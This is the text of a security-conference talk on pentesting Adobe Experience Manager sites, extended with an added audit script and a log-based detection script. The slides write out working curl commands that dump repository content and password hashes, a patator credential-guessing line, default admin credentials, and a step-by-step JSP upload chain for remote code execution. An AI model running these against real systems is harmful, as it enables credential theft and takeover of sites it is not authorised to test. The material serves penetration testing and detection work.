This presentation is about pentesting AEM web applications. It was shown at the PHDays security conference.
Hack1ng Adobe Experience Manager sites
Mikhail Egorov
Security researcher
Works in Odin (Parallels)
0ang3el (at) gma1l (d0t) com
Who is that guy?
http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/
http://www.slideshare.net/CQCON/prsentation-ben-zahler
https://docs.adobe.com/docs/en/aem/6-0/administer/security/security-checklist.html
Related Work
Sensitive information from JCR
Installed OSGI bundles
Custom scripts
Usernames
Password hashes
Elements that allow anonymous modification
What do we want
Use JsonRendererServlet
Sensitive information from JCR
curl -X GET http://127.0.0.1:8080/.json
curl -X GET http://127.0.0.1:8080/.6.json
curl -X GET http://127.0.0.1:8080/.tidy.6.json
curl -X GET http://127.0.0.1:8080/.tidy.infinity.json
List of all bundles
QueryBuilder is your friend! http://docs.adobe.com/docs/en/cq/5-6-1/dam/customizing_and_extendingcq5dam/query_builder.html
Installed OSGI bundles
curl -X GET http://127.0.0.1:8080/bin.tidy.infinity.json
curl -X GET http://127.0.0.1:8080/bin/querybuilder.json
List custom scripts
List compiled custom scripts from the cache
Custom scripts
curl -X GET http://127.0.0.1:8080/apps.tidy.infinity.json
curl -X GET http://127.0.0.1:8080/var/classes.tidy.infinity.json
Dump content node properties
Use a regular expression to extract usernames (piped from the previous command)
Usernames
curl -X GET http://127.0.0.1:8080/content.infinity.json | python -c 'import sys,re; print("\n".join(m.group(1) for m in re.finditer("\".+?By\":\"(.+?)\"", sys.stdin.read())))' | sort -u
Use QueryBuilder bundle
Password hashes
curl -X GET 'http://127.0.0.1:8080/bin/querybuilder.json?type=rep:User&p.hits=selective&p.properties=rep:principalName%20rep:password&p.limit=100'
Dump content node properties
Use a regular expression to check (piped from the previous command)
Anonymous modification
curl -X GET http://127.0.0.1:8080/content.infinity.json | python -c 'import sys,re; m = re.search("\".+?By\":\"anonymous\"", sys.stdin.read()); print("Anon modification: " + ("Yes" if m else "No"))'
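The two one-line regex checks above (usernames from `*By` properties and the anonymous-modification test) work on a single line of `.infinity.json` output and miss nested nodes when the output is multi-line. The following added example, which is not code from the slides, walks the JSON tree returned by the JsonRendererServlet properly and reports, for an instance you administer, the set of principals that created or modified content and every node path authored by `anonymous`. The sample tree is constructed in the shape of the `/content.infinity.json` response shown later in the deck; the `/content` root path is an assumption.

```python
"""Audit a JCR subtree dumped by the Sling JsonRendererServlet (<path>.infinity.json).

Added example for this page, not from the original slides. The dump is walked as a
tree, so nested nodes and multi-line (tidy) output are handled, and the result is the
list of paths an anonymous session has written to, which is what the site owner wants
to lock down.
"""
import json
import sys

# Constructed sample in the shape of a /content.infinity.json response (assumption).
SAMPLE_TREE = json.dumps({
    "jcr:primaryType": "sling:Folder",
    "jcr:createdBy": "admin",
    "site": {
        "jcr:primaryType": "cq:Page",
        "jcr:createdBy": "author",
        "jcr:content": {
            "jcr:primaryType": "cq:PageContent",
            "jcr:lastModifiedBy": "anonymous",
            "sling:resourceType": "foundation/components/page",
        },
    },
    "uploads": {
        "jcr:primaryType": "nt:folder",
        "jcr:createdBy": "anonymous",
        "notes.txt": {"jcr:primaryType": "nt:file", "jcr:createdBy": "anonymous"},
    },
})


def walk(node, path="/content"):
    """Yield (path, properties) for every node; child nodes are the dict-valued keys."""
    props = {k: v for k, v in node.items() if not isinstance(v, dict)}
    yield path, props
    for name, child in node.items():
        if isinstance(child, dict):
            yield from walk(child, f"{path}/{name}")


def audit(tree_json, root="/content"):
    """Return all principals seen in *By properties and the paths touched by anonymous."""
    tree = json.loads(tree_json)
    principals = set()
    anonymous_paths = []
    for path, props in walk(tree, root):
        for key, value in props.items():
            # jcr:createdBy, jcr:lastModifiedBy, cq:lastReplicatedBy, ... all end in "By".
            if key.endswith("By") and isinstance(value, str):
                principals.add(value)
                if value == "anonymous" and path not in anonymous_paths:
                    anonymous_paths.append(path)
    return {"principals": sorted(principals), "anonymous_modified": anonymous_paths}


if __name__ == "__main__":
    # Pipe a real dump in, or run with no input to audit the constructed sample.
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_TREE
    report = audit(data)
    print("Principals:", ", ".join(report["principals"]))
    for p in report["anonymous_modified"]:
        print("Anonymous write:", p)
```

Any path in the `anonymous_modified` list means the anonymous session holds `jcr:write` (or broader) on that node; the fix is an ACL change on the node, not just a Dispatcher rule, because the write goes through the Sling POST servlet on the author or publish instance itself.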
Try default user credentials: admin/admin, author/author, anonymous/anonymous
Offline attack (brute hashes)
Online attack (POST servlet bundle)
Getting access
patator http_fuzz url=http://127.0.0.1:8080/content/fake.json method=POST user_pass=FILE0:FILE1 0=users.txt 1=pass.txt auth_type=basic -x ignore:code!=200 --threads 5
XSS
CSRF
DoS
Read local files
RCE
You have access, now what?
Not covered, sorry!
CVE-2015-1833 ( http://seclists.org/oss-sec/2015/q2/518 )
The WebDAV OSGi bundle uses an XML parser that is not properly initialized
Exploit - https://www.exploit-db.com/exploits/37110/
Webdav bundle, XXE
Out-of-band exploitation: http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html
Pros: works with anonymous credentials
Cons: you need an external server, unstable
Inbound exploitation
Pros: you do not need an external server, more stable
Cons: you need credentials of a user that is able to modify some node in the JCR
Webdav bundle, XXE
http://www.youtube.com/watch?v=Hg3AXoG89Gs
Webdav bundle, XXE Demo
We have node http://127.0.0.1:8080/rce
We have script exec.jsp that is magically loaded into node http://127.0.0.1:8080/apps/rcetype
When someone navigates to http://127.0.0.1:8080/rce.exec our exec.jsp will be executed.
Remote code execution
{"jcr:createdBy":"admin","jcr:created":"Sun May 03 2015 21:24:38 GMT+0300","jcr:primaryType":"nt:folder","exec.jsp":{"jcr:createdBy":"admin","jcr:created":"Sun May 03 2015 21:24:38 GMT+0300","jcr:primaryType":"nt:file"}}
{"sling:resourceType":"rcetype","jcr:primaryType":"nt:unstructured"}
Step I: Create rcetype node
Remote code execution
curl -u admin:admin -F jcr:primaryType=nt:folder http://127.0.0.1:8080/content/rcetype
Step II: Upload script exec.jsp to rcetype node
Remote code execution
curl -u admin:admin -F exec.jsp=@exec.jsp http://127.0.0.1:8080/content/rcetype
Step III: Copy rcetype to /apps
Remote code execution
curl -u admin:admin -F :operation=copy -F :dest=/apps/rcetype http://127.0.0.1:8080/content/rcetype
Step IV: Create rce node bound to rcetype
Remote code execution
curl -u admin:admin -F sling:resourceType=rcetype http://127.0.0.1:8080/content/rce
Step V: Launch jsp script
Remote code execution
curl -X GET http://127.0.0.1:8080/content/rce.exec
http://www.youtube.com/watch?v=Z9n2T07e6Ls
Remote code execution, Demo
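Everything in this deck, from the `.infinity.json` tree dumps and the QueryBuilder query for `rep:password` through the patator credential guessing to the POST-servlet writes that precede the `.exec` request, passes through the HTTP front end and leaves a trace in its access log. The following added example, which is not part of the slides, is detection logic a SOC could run over Dispatcher/Apache combined-format access logs: it flags the JSON renderer and QueryBuilder patterns shown above, a burst of 401 responses from one source (the patator run), and a successful POST from that same source afterwards. The log lines are constructed samples, and the five-failures-in-sixty-seconds threshold is an assumption to be tuned per site.

```python
"""Detect the AEM recon and credential-guessing patterns from the slides in access logs.

Added example for this page, not from the original slides. Input is Apache/Dispatcher
combined-format access log lines; the sample lines below are constructed and the
alert thresholds are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)

# Ordered: the most specific indicator first. A bare "<node>.json" is not flagged,
# since sites legitimately serve JSON; depth selectors and QueryBuilder are the
# sharp signals (and are what the Adobe checklist tells you to deny at the Dispatcher).
RECON_PATTERNS = [
    ("querybuilder_password", re.compile(r"/bin/querybuilder\.json\?.*rep:password")),
    ("querybuilder", re.compile(r"/bin/querybuilder\.json")),
    ("json_tree_dump", re.compile(r"\.(?:tidy\.)?(?:infinity|-?\d+)\.json\b")),
]

# Constructed sample log (attacker source 203.0.113.7, one benign visitor).
SAMPLE_LOG = """\
203.0.113.7 - - [03/May/2015:21:20:01 +0300] "GET /.tidy.infinity.json HTTP/1.1" 200 58231 "-" "curl/7.38.0"
203.0.113.7 - - [03/May/2015:21:20:05 +0300] "GET /bin/querybuilder.json?type=rep:User&p.hits=selective&p.properties=rep:principalName%20rep:password&p.limit=100 HTTP/1.1" 200 1873 "-" "curl/7.38.0"
203.0.113.7 - - [03/May/2015:21:21:00 +0300] "POST /content/fake.json HTTP/1.1" 401 - "-" "python-requests/2.5"
203.0.113.7 - - [03/May/2015:21:21:00 +0300] "POST /content/fake.json HTTP/1.1" 401 - "-" "python-requests/2.5"
203.0.113.7 - - [03/May/2015:21:21:01 +0300] "POST /content/fake.json HTTP/1.1" 401 - "-" "python-requests/2.5"
203.0.113.7 - - [03/May/2015:21:21:01 +0300] "POST /content/fake.json HTTP/1.1" 401 - "-" "python-requests/2.5"
203.0.113.7 - - [03/May/2015:21:21:02 +0300] "POST /content/fake.json HTTP/1.1" 401 - "-" "python-requests/2.5"
203.0.113.7 - - [03/May/2015:21:21:03 +0300] "POST /content/fake.json HTTP/1.1" 200 412 "-" "python-requests/2.5"
198.51.100.4 - - [03/May/2015:21:22:00 +0300] "GET /content/site/en.html HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
"""


def parse(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["status"] = int(ev["status"])
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return ev


def detect(lines, auth_fail_threshold=5, window_seconds=60):
    """Return (alert_name, source_ip, url) tuples for the patterns described above."""
    alerts = []
    fails = defaultdict(list)   # ip -> timestamps of recent 401 responses
    burst_ips = set()           # ips that already crossed the brute-force threshold
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        ip, url, status, ts = ev["ip"], ev["url"], ev["status"], ev["ts"]
        for name, pattern in RECON_PATTERNS:
            if pattern.search(url):
                alerts.append((name, ip, url))
                break
        if status == 401:
            # Sliding window of authentication failures per source.
            fails[ip] = [t for t in fails[ip] if (ts - t).total_seconds() <= window_seconds]
            fails[ip].append(ts)
            if len(fails[ip]) >= auth_fail_threshold and ip not in burst_ips:
                burst_ips.add(ip)
                alerts.append(("auth_brute_force", ip, url))
        elif ip in burst_ips and ev["method"] == "POST" and status in (200, 201):
            # A write accepted right after a guessing burst: treat as credential compromise.
            alerts.append(("post_after_brute_force", ip, url))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

The `post_after_brute_force` alert is the one to page on: it marks the point where the chain moves from guessing to the Sling POST servlet, which is exactly the step (creating nodes and copying them under `/apps`) that the RCE walkthrough above depends on. The form fields themselves (`:operation`, `:dest`) are in the request body and never reach the access log, so correlating the accepted POST with the preceding 401 burst is how the front-end log can still surface it; confirming what was written requires the instance's own audit log or a JCR diff of `/apps`.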
Ask a Ninja